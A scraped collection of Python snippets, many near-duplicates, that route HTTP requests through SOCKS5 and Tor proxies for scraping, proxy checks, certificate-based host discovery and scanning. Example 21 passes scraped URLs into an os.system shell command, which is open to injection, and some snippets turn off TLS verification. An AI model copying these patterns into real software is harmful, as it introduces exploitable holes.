Example 1
def get_page(url, port, timeout, max_retries=1):
    if max_retries == 1:
        session = requesocks.session()
    elif max_retries > 1:
        session = requesocks.session(config={'max_retries': max_retries})
    else:
        raise ValueError('max_retries must be a positive integer')
    session.proxies = {'http': 'socks5://127.0.0.1:{}'.format(port),
                       'https': 'socks5://127.0.0.1:{}'.format(port)}
    return session.get(url, timeout=timeout)
Example 2
def get_page(url, port, timeout, max_retries=1):
    if max_retries == 1:
        session = requesocks.session()
    elif max_retries > 1:
        session = requesocks.session(config={'max_retries': max_retries})
    else:
        raise Exception
    session.proxies = {'http': 'socks5://127.0.0.1:{}'.format(port),
                       'https': 'socks5://127.0.0.1:{}'.format(port)}
    return session.get(url, timeout=timeout)
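A minimal sketch of the same request with plain requests rather than requesocks, assuming a recent release with the SOCKS extra installed (pip install requests[socks]); url, port and timeout are placeholders:

import requests

def get_page(url, port, timeout):
    # Sketch only: assumes requests >= 2.10 with PySocks available.
    session = requests.Session()
    # socks5h:// also routes DNS resolution through the proxy (useful with Tor).
    session.proxies = {'http': 'socks5h://127.0.0.1:{}'.format(port),
                       'https': 'socks5h://127.0.0.1:{}'.format(port)}
    return session.get(url, timeout=timeout)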
Example 3
def runtest():
	if target.tor is None and target.proxy is None and target.socks is None:
		try:
			request = requests.get(target.host)
			checkparam(request)
		except requests.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"

	elif target.tor is not None and target.proxy is None and target.socks is None:
		try:		
			session = requesocks.session()
			session.proxies = {
				"socks5": "socks5://127.0.0.1:9050"
			}
			request = session.get(target.host, auth=('user','pass'))
			checkparam(request)
		except requesocks.exceptions.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"

	elif target.proxy is not None and target.tor is None and target.socks is None:
		proxy = {
			"http": "http://"+target.proxy,
			"https": "https://"+target.proxy
		}
		try:
			request = requests.get(target.host, proxies=proxy)
			checkparam(request)
		except requests.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"		 	

	elif target.socks is not None and target.proxy is None and target.tor is None:
		try:		
			session = requesocks.session()
			session.proxies = {
				"socks4": "socks4://"+target.socks,
				"socks5": "socks5://"+target.socks
			}
			request = session.get(target.host, auth=('user','pass'))
			checkparam(request)
		except requesocks.exceptions.ConnectionError as error_message:
			print "============================"
			print "HTTP connection failed with status message:"
			print error_message
			print "============================"
Example 4
def runtest():
    if target.tor is None and target.proxy is None and target.socks is None:
        try:
            request = requests.get(target.host)
            checkparam(request)
        except requests.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"

    elif target.tor is not None and target.proxy is None and target.socks is None:
        try:
            session = requesocks.session()
            session.proxies = {"socks5": "socks5://127.0.0.1:9050"}
            request = session.get(target.host, auth=('user', 'pass'))
            checkparam(request)
        except requesocks.exceptions.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"

    elif target.proxy is not None and target.tor is None and target.socks is None:
        proxy = {
            "http": "http://" + target.proxy,
            "https": "https://" + target.proxy
        }
        try:
            request = requests.get(target.host, proxies=proxy)
            checkparam(request)
        except requests.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"

    elif target.socks is not None and target.proxy is None and target.tor is None:
        try:
            session = requesocks.session()
            session.proxies = {
                "socks4": "socks4://" + target.socks,
                "socks5": "socks5://" + target.socks
            }
            request = session.get(target.host, auth=('user', 'pass'))
            checkparam(request)
        except requesocks.exceptions.ConnectionError as error_message:
            print "============================"
            print "HTTP connection failed with status message:"
            print error_message
            print "============================"
Example 5
		def downloadNewImages():
			tor_process = stem.process.launch_tor_with_config(config = {'SocksPort': str(self.socks_port)})
			self.success = []
			for x in self.new_dog_img_dict.keys():
				try:
					dfile = self.new_dog_img_dict[x]
					fname= x +'.jpg'
					if not self.bucket.get_key(fname):
						session = requesocks.session()
						session.proxies = {'http': 'socks5://127.0.0.1:9050','https': 'socks5://127.0.0.1:9050'}
				
						file_object = self.bucket.new_key(fname)
						r = session.get(dfile)
						if r.status_code == 200:
							with open(fname, 'wb') as f:
								r.raw.decode_content = True
								shutil.copyfileobj(r.raw, f)
							file_object.set_contents_from_filename('./'+fname,policy='public-read')
							self.success.append(x)
							os.remove(fname)
						else:
							self.err_coll.insert_one({'id': x, 'err': r.status_code})
				except:
					e = sys.exc_info()[1]
					self.err_coll.insert_one({'id': x, 'err': str(e)})
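When copying a response body from r.raw with shutil.copyfileobj, the body must not be read eagerly: requesocks (an old requests fork) used prefetch=False for this (see Example 57), while modern requests uses stream=True. A minimal sketch of the download step under that assumption, with a placeholder URL and filename:

import shutil
import requests  # sketch assumes requests[socks] in place of requesocks

session = requests.Session()
session.proxies = {'http': 'socks5h://127.0.0.1:9050',
                   'https': 'socks5h://127.0.0.1:9050'}
r = session.get('http://example.com/dog.jpg', stream=True)  # keep r.raw unconsumed
if r.status_code == 200:
    r.raw.decode_content = True
    with open('dog.jpg', 'wb') as f:
        shutil.copyfileobj(r.raw, f)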
Example 6
    def get_metadata(self):
        if self.script_alias:
            archive_url = '{0}/{1}/perfsonar/archive/'.format(
                self.api_url, self.script_alias)
        else:
            archive_url = '{0}/perfsonar/archive/'.format(self.api_url)

        session = requesocks.session()
        if os.getenv('SOCKS5'):
            session.proxies = {
                'http': os.getenv('SOCKS5'),
                'https': os.getenv('SOCKS5')
            }
        session.verify = False
        r = session.get(archive_url,
                        params=dict(self.filters.metadata_filters,
                                    **self.filters.time_filters),
                        headers=self.request_headers)

        self.inspect_request(r)

        if r.status_code == 200 and \
            r.headers['content-type'] == 'application/json':
            data = json.loads(r.text)
            for i in data:
                yield Metadata(i, self.api_url, self.filters)
        else:
            self.http_alert(r)
            return
            yield
Example 7
def main(stochastic=False, resolve_classes=False):
    session = requesocks.session()
    resolver = ClassResolver(session, resolve_classes)
    timeschedules = TimeSchedules(session)
    print('loaded')
    for index, term in enumerate(timeschedules):
        print(term)
        has_entries = False
        # ignore with probability 1 - (1 / index)
        if random.random() * index >= 1 and stochastic:
            continue
        dataset = TimeSchedulesDataset()
        for dept in term:
            print(dept)
            dataset.add(dept.get_entries())
            has_entries = True
        if has_entries:
            base = os.path.dirname(os.path.realpath(__file__))
            dataset.notify_changes(
                '/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
            dataset.write_timeschedules(
                '/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
            dataset.write_timeschedules_compressed(
                '/var/www/canigraduate/data/timeschedules-compressed/%s.json' %
                str(term))
            dataset.write_timeschedules_data_compressed(
                '/var/www/canigraduate/data/timeschedules-compressed/%s.data.json'
                % str(term))
        if resolve_classes:
            for id in dataset.data.keys():
                resolver.add(id, term, dataset.names[id])
    print('resolving classes')
    if resolve_classes:
        resolver.write(resolve_classes)
Example 8
    def get_metadata(self):
        if self.script_alias:
            archive_url = '{0}/{1}/perfsonar/archive/'.format(self.api_url, self.script_alias)
        else:
            archive_url = '{0}/perfsonar/archive/'.format(self.api_url)
        
        session = requesocks.session()
        if os.getenv('SOCKS5'):
            session.proxies = {'http': os.getenv('SOCKS5'), 'https': os.getenv('SOCKS5')}
        session.verify=False
        r = session.get(archive_url, 
           params=dict(self.filters.metadata_filters, **self.filters.time_filters),
           headers = self.request_headers)

        self.inspect_request(r)

        if r.status_code == 200 and \
            r.headers['content-type'] == 'application/json':
            data = json.loads(r.text)
            for i in data:
                yield Metadata(i, self.api_url, self.filters)
        else:
            self.http_alert(r)
            return
            yield
Example 9
def get_by_rnp(number, TIMEOUT):
    payload = {
        #"action": "enviar",
        "txtRuc": "",
        "txtRnp": str(number),
        "cmbCapitulo": "",
        "cmbTipoPersona": "",
    }

    kargs = {
        "data": payload,
        "headers": _headers,
        "timeout": TIMEOUT,
    }

    url = "http://www.osce.gob.pe/consultasenlinea/rnp_consulta/ProveedoresInscritos.asp?action=enviar"
    tor_req = req_socks.session()
    tor_req.proxies = _tor_proxies
    try:
        r = tor_req.post(url, **kargs)
        name = extract_name(r.text)
        if name is not None:
            with codecs.open("out_osce.tsv", "a") as myfile:
                myfile.write(number.encode("utf-8") + "\t")
                myfile.write(name.encode("utf-8") + "\n")
    except req_socks.exceptions.Timeout:
        with codecs.open("out_osce.tsv", "a") as myfile:
            out = "Timeout error %s" % number.encode("utf-8")
            myfile.write(out + "\n")
    except socket.timeout:
        with codecs.open("out_osce.tsv", "a") as myfile:
            out = "Timeout error %s" % number.encode("utf-8")
            myfile.write(out + "\n")
Example 10
def getip_requesocks(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'}
    r = session.get(url)
    print "(+) IP is: " + r.text.replace("\n", "")
Example 11
    def __init__(self, cookies_dict: dict=None):
        self.xnova_url = 'uni4.xnova.su'
        self.user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0'
        self.error_str = None
        self.proxy = None
        # load user-agent from config/net.ini
        cfg = configparser.ConfigParser()
        cfg.read('config/net.ini', encoding='utf-8')
        if 'net' in cfg:
            self.user_agent = cfg['net']['user_agent']
            self.xnova_url = cfg['net']['xnova_url']
            self.proxy = cfg['net']['proxy']
            if self.proxy == '':
                self.proxy = None
        # construct requests HTTP session
        if self.proxy is not None and self.proxy.startswith('socks5://'):
            # for SOCKS5 proxy create requesocks session
            self.sess = requesocks.session()
            logger.info('Using SOCKS5 proxy session (requesocks)')
        else:
            # otherwise (no proxy, or a plain HTTP proxy) use a normal requests session
            self.sess = requests.Session()
        if self.proxy is not None:
            self.sess.proxies = {'http': self.proxy, 'https': self.proxy}
            logger.info('Set HTTP/HTTPS proxy to: {0}'.format(self.proxy))

        # Some default headers for a page downloader
        self.sess.headers.update({'User-Agent': self.user_agent})
        self.sess.headers.update({'Referer': 'https://{0}/'.format(self.xnova_url)})
        self.sess.headers.update({'Accept': '*/*'})
        self.sess.headers.update({'Accept-Language': 'ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4'})
        self.sess.headers.update({'Accept-Encoding': 'gzip, deflate'})
        
        if cookies_dict:
            self.set_cookies_from_dict(cookies_dict)
Example 12
def downloadNewImages(bucket, new_dog_img_dict, d_id):
	try:
		dfile = new_dog_img_dict[d_id]
		fname= d_id +'.jpg'
		if not bucket.get_key(fname):
			session = requesocks.session()
			session.proxies = {'http': 'socks5://127.0.0.1:9050','https': 'socks5://127.0.0.1:9050'}
	
			file_object = bucket.new_key(fname)
			r = session.get(dfile)
			if r.status_code == 200:
				with open(fname, 'wb') as f:
					r.raw.decode_content = True
					shutil.copyfileobj(r.raw, f)
				file_object.set_contents_from_filename('./'+fname,policy='public-read')
				os.remove(fname)
			else:
				client = MongoClient()
				db = client.pet
				err_coll = db.errs
				err_coll.insert_one({'id':d_id, 'err':r.status_code})
	except:
		client = MongoClient()
		db = client.pet
		err_coll = db.errs
		e = sys.exc_info()[1]
		err_coll.insert_one({'id': d_id, 'err': str(e)})
Example 13
def main(stochastic=False, resolve_classes=False):
	session = requesocks.session()
	session.proxies = {'http':'54.183.147.66:3128',
									   'https':'54.183.147.66:3128'}
	resolver = ClassResolver(session, resolve_classes)
	timeschedules = TimeSchedules(session)
	print('loaded')
	for index, term in enumerate(timeschedules):
		print(term)
		has_entries = False
		# ignore with probability 1 - (1 / index)
		if random.random() * index >= 1 and stochastic:
			continue
		dataset = TimeSchedulesDataset()
		for dept in term:
			print(dept)
			dataset.add(dept.get_entries())
			has_entries = True
		if has_entries:
			base = os.path.dirname(os.path.realpath(__file__))
			dataset.notify_changes('/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
			dataset.write_timeschedules('/var/www/canigraduate/data/timeschedules/%s.json' % str(term))
			dataset.write_timeschedules_compressed('/var/www/canigraduate/data/timeschedules-compressed/%s.json' % str(term))
			dataset.write_timeschedules_data_compressed('/var/www/canigraduate/data/timeschedules-compressed/%s.data.json' % str(term))
		if resolve_classes:
			for id in dataset.data.keys():
				resolver.add(id, term, dataset.names[id])
	print('resolving classes')
	if resolve_classes:
		resolver.write(resolve_classes)
Example 14
    def login(self):
        self.s = requests.session()

        #self.s.proxies = {'http': 'http://127.0.0.1:8087','https': 'http://127.0.0.1:8087'}
                           
        soup = BeautifulSoup(self.get_source(self.login_url))
        authenticity_token =  soup.find_all(attrs={"name": "authenticity_token"})[0]['value']
        utf8 =  soup.find_all(attrs={"name": "utf8"})[0]['value']
        data = {
            'utf8':utf8,
            'session[login]':self.username,
            'session[password]':self.password,
            'authenticity_token' : authenticity_token
        }

        self.s.post(soup.select('.sign-in__form')[0]['action'], data = data)

        soup = BeautifulSoup(self.get_source('https://tutsplus.com/account/courses'))
        account_name = soup.select('.account-header__name')[0].string

        if not account_name :
            return False

        print 'Login succeeded, account name: ' + account_name
        return True
Example 15
def call_uber_api(port, token, lat, lon, fpath):
    """Build a socks session."""
    print 'Calling api for ' + fpath, port
    proxy_addr = 'socks5://127.0.0.1:%s' %port
    session = requests.session()
    session.proxies = {'http': proxy_addr, 'https': proxy_addr}

    url = 'https://api.uber.com/v1/estimates/price'

    parameters = {
    'server_token': token,
    'start_latitude': lat,
    'start_longitude': lon,
    'end_latitude': lat,
    'end_longitude': lon
    }

    with open(fpath, 'a') as f:
        while True:
            try:
                response = session.get(url = url, params = parameters)
                res_json = json.loads(response.content)
            except Exception, e:
                sys.stderr.write(fpath + ': ' + str(e) + '\n')
                break

            f.write(str(int(time.time() * 1000)) + ':::::')
            json.dump(res_json, f)
            f.write('\n')

            break
Example 16
 def __init__(self):
     self.cookies = {}
     self.browser = requesocks.session()
     self.browser.cookies.clear()
     self.browser.cookies = self.cookies
     self.sock5 = None
     self.proxy = None
Example 17
    def __init__(self, args):
        super(HttpScan, self).__init__(args)
        self.session = requesocks.session()

        adapters.DEFAULT_RETRIES = self.args.max_retries
        self.tor = None
        if self.args.tor:
            self.out.log("Enabling TOR")
            self.tor = Torify()
            self.session.proxies = {'http': 'socks5://127.0.0.1:9050',
                                    'https': 'socks5://127.0.0.1:9050'}
            if self.args.check_tor:
                # Check TOR
                self.out.log("Checking IP via TOR")
                rip, tip = self.tor.check_ip(verbose=True)
                if tip is None:
                    self.out.log('TOR is not working properly!', logging.ERROR)
                    exit(-1)

        if self.args.cookies is not None:
            if path.exists(self.args.cookies) and path.isfile(self.args.cookies):
                self.cookies = MozillaCookieJar(self.args.cookies)
                self.cookies.load()
            else:
                # self.out.log('Could not find cookie file: %s' % self.args.load_cookies, logging.ERROR)
                self.cookies = Cookies.from_request(self.args.cookies)
        else:
            self.cookies = None

        self.ua = UserAgent() if self.args.user_agent is None else self.args.user_agent
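Setting adapters.DEFAULT_RETRIES changes a module-level global for every session in the process. A hedged alternative sketch with plain requests is to mount an HTTPAdapter carrying a per-session retry count (the value 3 is illustrative):

import requests
from requests.adapters import HTTPAdapter

session = requests.Session()
adapter = HTTPAdapter(max_retries=3)  # retries apply only to this session
session.mount('http://', adapter)
session.mount('https://', adapter)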
Example 18
 def construct_session(self):
     #
     # save cookies before replacing session
     saved_cookies = None
     if self.sess is not None:
         if self.sess.cookies is not None:
             saved_cookies = self.sess.cookies
     #
     if self.proxy is not None and self.proxy.startswith('socks5://'):
         # for SOCKS5 proxy create requesocks session
         self.sess = requesocks.session()
         logger.info('Using SOCKS5 proxy session (requesocks)')
     else:
         self.sess = requests.Session()  # normal session (no proxy, or a plain HTTP proxy)
         logger.info('Using normal session (requests)')
     if self.proxy is not None:
         self.sess.proxies = {'http': self.proxy, 'https': self.proxy}
         logger.info('Set HTTP/HTTPS proxy to: {0}'.format(self.proxy))
     self.sess.headers.update(
         {'referer': 'http://{0}/'.format(self.xnova_url)})
     #
     # restore saved cookies?
     if saved_cookies is not None:
         self.sess.cookies = saved_cookies
Example 19
def getip_requesocks(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050',
    'https': 'socks5://127.0.0.1:9050'}
    r = session.get(url)
    print "(+) IP is: " + r.text.replace("\n", "")
Example 20
def test_proxy_by_requesocks():
    import requesocks as requests

    session = requests.session()
    session.proxies = proxies
    m = session.get('https://pixiv.net', headers=PIXIV_PAGE_HEADERS)
    print (m.content)
Example 21
def getUrl(animelist):
    s = requesocks.session()
    s.proxies = {'http':'socks5://127.0.0.1:1080'}
    urllist = []
    for item in animelist:
        res = s.get('http://www.dilidili.com/anime/'+item).content
        soup = BeautifulSoup(res, "lxml")
        try:
            u = soup.find('div', 'download area').a['href']
        except:
            continue
        if re.search('pan.baidu', u):
            urllist.append(u)
            print "Get Url:"+u
            continue
        res = s.get(u).content
        soup = BeautifulSoup(res, "lxml")
        for it in soup('a', href=True):
            if re.search('pan.baidu', it['href']):
                urllist.append(it['href'])
                print "Get url:"+it['href']
                break
    for item in urllist:
        os.system('echo %s >> urllist.txt' % item)
    return urllist
Example 22
def run():
    global ipQueueList
    while not ipQueueList.empty():

        ip = ipQueueList.get()
        burp0_url = "https://www.virustotal.com:443/ui/ip_addresses/%s/resolutions?cursor=&limit=10" % ip
        burp0_headers = {
            "Accept": "*/*",
            "Accept-Language": "en",
            "User-Agent":
            "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            "Connection": "close"
        }
        proxies = {
            "http": "socks5://127.0.0.1:9000",
            "https": "socks5://127.0.0.1:9000"
        }
        session = requests.session()
        session.proxies = proxies
        session.headers = burp0_headers
        resp = session.get(burp0_url, timeout=20).content
        msg = "NotFoundError"
        try:
            msg = json.loads(resp)['data'][0]['attributes']['host_name']
        except:
            try:
                print json.loads(resp)['data']
            except Exception as e:
                msg = "NotFoundError"
        finally:
            print "[+]%s ====>>> %s" % (ip, msg)
Example 23
def get_http_client():
    if config['use_tor_proxy']:
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:%d' % config['tor_proxy_port'],
                           'https': 'socks5://127.0.0.1:%d' % config['tor_proxy_port']}
        return session
    else:
        return requests.session()
Example 24
def get_http_client():
    if config['use_tor_proxy']:
        session = requesocks.session()
        session.proxies = {'http': 'socks5://127.0.0.1:%d' % config['tor_proxy_port'],
                           'https': 'socks5://127.0.0.1:%d' % config['tor_proxy_port']}
        return session
    else:
        return requests.session()
Example 25
 def makeSession(self):
     self.session = requesocks.session()
     #Use Tor for both HTTP and HTTPS
     if self.tor:
         self.session.proxies = {
             'http': 'socks5://localhost:9150',
             'https': 'socks5://localhost:9150'
         }
Example 26
def doGet(*args, **kwargs):
    url        = args[0]
    doVhosts   = kwargs.pop('vhosts'    ,None)
    urlQueue   = kwargs.pop('urlQueue'  ,None)
    subs       = kwargs.pop('subs'      ,None)
    extraHosts = kwargs.pop('extraHosts',None)
    proxy = kwargs.pop('proxy',None)

    kwargs['allow_redirects'] = False
    session = requests.session()
    if(proxy is not None):
        session.proxies={'http':'socks5://'+proxy,'https':'socks5://'+proxy}
    resp = session.get(url[0],**kwargs)

    #If we have an https URL and we are configured to scrape hosts from the cert...
    if(url[0].find('https') != -1 and url[1] == True):
        #Pull hostnames from cert, add as additional URLs and flag as not to pull certs
        host = urlparse(url[0]).hostname
        port = urlparse(url[0]).port
        if(port is None):
            port = 443
        names = []
        try:
            cert     = ssl.get_server_certificate((host,port),ssl_version=ssl.PROTOCOL_SSLv23)
            x509     = M2Crypto.X509.load_cert_string(cert.decode('string_escape'))
            subjText = x509.get_subject().as_text()
            names    = re.findall("CN=([^\s]+)",subjText)
            altNames = x509.get_ext('subjectAltName').get_value()
            names.extend(re.findall("DNS:([^,]*)",altNames))
        except:
            pass

        for name in names:
            if(name.find('*.') != -1):
                for sub in subs:
                    try:
                        sub = sub.strip()
                        hostname = name.replace('*.',sub+'.')
                        if(hostname not in extraHosts):
                            extraHosts[hostname] = 1
                            address = socket.gethostbyname(hostname)
                            urlQueue.put(['https://'+hostname+':'+str(port),False,url[2]])
                            print '[+] Discovered subdomain '+address
                    except:
                        pass
                name = name.replace('*.','')
                if(name not in extraHosts):
                    extraHosts[name] = 1
                    urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
                    print '[+] Added host '+name
            else:
                if (name not in extraHosts):
                    extraHosts[name] = 1
                    urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
                    print '[+] Added host '+name
        return resp
    else:
        return resp
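The certificate-scraping branch above extracts the CN and subjectAltName entries with M2Crypto and regexes. A hedged sketch of the same idea using the cryptography package instead (host and port are placeholders; assumes a recent cryptography release):

import ssl
from cryptography import x509
from cryptography.x509.oid import NameOID

def cert_names(host, port=443):
    # Fetch the server certificate (PEM) and collect CN plus SAN DNS names.
    pem = ssl.get_server_certificate((host, port))
    cert = x509.load_pem_x509_certificate(pem.encode('ascii'))
    names = [attr.value for attr in cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME)]
    try:
        san = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName)
        names.extend(san.value.get_values_for_type(x509.DNSName))
    except x509.ExtensionNotFound:
        pass
    return names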
Example 27
def doGet(*args, **kwargs):
    url = args[0]
    doVhosts = kwargs.pop("vhosts", None)
    urlQueue = kwargs.pop("urlQueue", None)
    subs = kwargs.pop("subs", None)
    extraHosts = kwargs.pop("extraHosts", None)
    proxy = kwargs.pop("proxy", None)

    kwargs["allow_redirects"] = False
    session = requests.session()
    if proxy is not None:
        session.proxies = {"http": "socks5://" + proxy, "https": "socks5://" + proxy}
    resp = session.get(url[0], **kwargs)

    # If we have an https URL and we are configured to scrape hosts from the cert...
    if url[0].find("https") != -1 and url[1] == True:
        # Pull hostnames from cert, add as additional URLs and flag as not to pull certs
        host = urlparse(url[0]).hostname
        port = urlparse(url[0]).port
        if port is None:
            port = 443
        names = []
        try:
            cert = ssl.get_server_certificate((host, port), ssl_version=ssl.PROTOCOL_SSLv23)
            x509 = M2Crypto.X509.load_cert_string(cert.decode("string_escape"))
            subjText = x509.get_subject().as_text()
            names = re.findall("CN=([^\s]+)", subjText)
            altNames = x509.get_ext("subjectAltName").get_value()
            names.extend(re.findall("DNS:([^,]*)", altNames))
        except:
            pass

        for name in names:
            if name.find("*.") != -1:
                for sub in subs:
                    try:
                        sub = sub.strip()
                        hostname = name.replace("*.", sub + ".")
                        if hostname not in extraHosts:
                            extraHosts[hostname] = 1
                            address = socket.gethostbyname(hostname)
                            urlQueue.put(["https://" + hostname + ":" + str(port), False, url[2]])
                            print "[+] Discovered subdomain " + address
                    except:
                        pass
                name = name.replace("*.", "")
                if name not in extraHosts:
                    extraHosts[name] = 1
                    urlQueue.put(["https://" + name + ":" + str(port), False, url[2]])
                    print "[+] Added host " + name
            else:
                if name not in extraHosts:
                    extraHosts[name] = 1
                    urlQueue.put(["https://" + name + ":" + str(port), False, url[2]])
                    print "[+] Added host " + name
        return resp
    else:
        return resp
Example 28
def doGet(*args, **kwargs):
	url        = args[0]
	doVhosts   = kwargs.pop('vhosts'    ,None)
	urlQueue   = kwargs.pop('urlQueue'  ,None)
	subs       = kwargs.pop('subs'      ,None)
	extraHosts = kwargs.pop('extraHosts',None)
	proxy = kwargs.pop('proxy',None)

	kwargs['allow_redirects'] = False
	session = requests.session()
	if(proxy is not None):
		session.proxies={'http':'socks5://'+proxy,'https':'socks5://'+proxy}
	resp = session.get(url[0],**kwargs)

	#If we have an https URL and we are configured to scrape hosts from the cert...
	if(url[0].find('https') != -1 and url[1] == True):
		#Pull hostnames from cert, add as additional URLs and flag as not to pull certs
		host = urlparse(url[0]).hostname
		port = urlparse(url[0]).port
		if(port is None):
			port = 443
		names = []
		try:
			cert     = ssl.get_server_certificate((host,port),ssl_version=ssl.PROTOCOL_SSLv23)
			x509     = M2Crypto.X509.load_cert_string(cert.decode('string_escape'))
			subjText = x509.get_subject().as_text()
			names    = re.findall("CN=([^\s]+)",subjText)
			altNames = x509.get_ext('subjectAltName').get_value()
			names.extend(re.findall("DNS:([^,]*)",altNames))
		except:
			pass

		for name in names:
			if(name.find('*.') != -1):
				for sub in subs:
					try:
						sub = sub.strip()
						hostname = name.replace('*.',sub+'.')
						if(hostname not in extraHosts):
							extraHosts[hostname] = 1
							address = socket.gethostbyname(hostname)
							urlQueue.put(['https://'+hostname+':'+str(port),False,url[2]])
							print '[+] Discovered subdomain '+address
					except:
						pass
				name = name.replace('*.','')
				if(name not in extraHosts):
					extraHosts[name] = 1
					urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
					print '[+] Added host '+name
			else:
				if (name not in extraHosts):
					extraHosts[name] = 1
					urlQueue.put(['https://'+name+':'+str(port),False,url[2]])
					print '[+] Added host '+name
		return resp
	else:	
		return resp
Example 29
def init_tor_session():
	global session
	if not session:
		session = requesocks.session()
		session.proxies = {
    			'http': 'socks5://127.0.0.1:9050',
    			'https': 'socks5://127.0.0.1:9050'
		}
		session.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'
Example 30
def get_ip_requesocks(url):
    print('(+) Sending request with requesocks...')
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://127.0.0.1:9050',
        'https': 'socks5://127.0.0.1:9050'
    }
    r = session.get(url)
    print('(+) IP is: {}'.format(r.text.replace('\n', '')))
Example 31
class GCMPush:
    session = requesocks.session() 
    session.proxies = {
        'http': config.SOCKS5_PROXY,
        'https': config.SOCKS5_PROXY,
    }
    mysql = None
    gcm_apps = {}
        
    @classmethod
    def get_gcm_app(cls, appid):
        now = int(time.time())
        app = cls.gcm_apps[appid] if cls.gcm_apps.has_key(appid) else None
        # app not in cache, or the cache entry expired: fetch the latest accessid and secretkey from the database
        if app is None or now - app["timestamp"] > 60:
            sender_id, api_key = application.get_gcm_key(cls.mysql, appid)
            if sender_id is None or api_key is None:
                return None
            app = {}
            app["timestamp"] = now
            app["sender_id"] = sender_id
            app["api_key"] = api_key
            app["appid"] = appid
            cls.gcm_apps[appid] = app

        return app
    
    @classmethod
    def send(cls, api_key, device_token, title, content):
        obj = {
            "to" : device_token,
            "notification" : {
                "body" : content,
                "title" : title
            }
        }

        headers = {'Content-Type': 'application/json; charset=UTF-8',
                   'Authorization': 'key=' + api_key}



        res = cls.session.post(GCM_URL, data=json.dumps(obj), headers=headers)
        if res.status_code != 200:
            logging.error("send gcm message error")
        else:
            logging.debug("send gcm message success")
        
    @classmethod
    def push(cls, appid, title, token, content):
        app = cls.get_gcm_app(appid)
        if app is None:
            logging.warning("can't read gcm api key")
            return False

        cls.send(app["api_key"], token, title, content)
Example 32
def init_tor_session():
    global session
    if not session:
        session = requesocks.session()
        session.proxies = {
            'http': 'socks5://127.0.0.1:9050',
            'https': 'socks5://127.0.0.1:9050'
        }
        session.headers[
            'User-Agent'] = 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36'
Example 33
def reset_socks():
    if USE_SOCKS_PROXY:
        import os
        os.system("sudo killall -HUP tor") # force tor to get a new IP
        if DEBUG: 
            import requesocks as requests
            session = requests.session()
            session.proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
            resp = session.get('http://ipv4bot.whatismyipaddress.com')
            print(resp.text)
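Instead of sending SIGHUP to the tor process with killall, the stem controller (used the same way in Example 55 below) can request a fresh circuit over the control port. A short sketch, assuming the control port is 9051 and cookie or password-less authentication:

from stem import Signal
from stem.control import Controller

def new_tor_identity():
    # Ask the local tor daemon for a new circuit (same intent as the HUP above).
    with Controller.from_port(port=9051) as controller:
        controller.authenticate()
        controller.signal(Signal.NEWNYM)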
Example 34
 def __init__(self):
     self.cookies = {}
     self.browser = requesocks.session()
     self.browser.cookies.clear()
     self.browser.cookies = self.cookies
     self.header = 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'
     self.sock5 = False
     self.proxy = False
     self.link_host = ''
     self.link_origin = ''
Example 35
 def getip(self, url):
     print "(+) Sending request with requesocks..."
     session = requesocks.session()
     session.proxies = {
         'http': 'socks5://%s:%s' % (self.torip, self.torport),
         'https': 'socks5://%s:%s' % (self.torip, self.torport)
     }
     r = session.get(url)
     print "(+) IP is: " + r.text.replace("\n", "")
     return r.text.replace("\n", "")
Example 36
def getip(url):
    print "(+) Sending request with requesocks..."
    session = requesocks.session()
    session.proxies = {
        'http': 'socks5://14.63.227.176:9050',
        'https': 'socks5://14.63.227.176:9050'
    }
    r = session.get(url)
    print "(+) IP is: " + r.text.replace("\n", "")
    return r.text.replace("\n", "")
Example 37
def fetch_one_listing(base_url, page=""):
    base = base_url + page
    reset_socks()
    session = requests.session()
    session.proxies = {'http': 'socks5://127.0.0.1:9050', 'https': 'socks5://127.0.0.1:9050'}
    resp = session.get(base, timeout=3)
    try:
        resp.raise_for_status()  # <- no-op if status==200
    except:
        pass
    return resp.content, resp.encoding
Example 38
def scrape_category_page(url):
    session = requesocks.session()
    resp = requests_get_trycatch(url, session)
    if not resp:  # URL not valid
        return []
    soup = BeautifulSoup(resp.content)
    items = soup.find_all("a", {"class": "i"}, href=True)
    # if href contains craigslist them it is a redirect to a posting at another location
    item_hrefs = [item["href"] for item in items if "craigslist.org" not in item["href"]]

    return item_hrefs
Example 39
    def whoami(self):
        """
        This is a check to make sure the proxy is working.
        """

        IPCHICKEN = "http://www.ipchicken.com"
        session = requesocks.session()
        session.proxies = self.session_proxies
        response = session.get(IPCHICKEN, headers=self.request_params)
        soup = BS(response.content, 'html.parser')
        return soup.find_all('p')[1].find('b').next.replace(' ', '').replace('\n', '')
Example 40
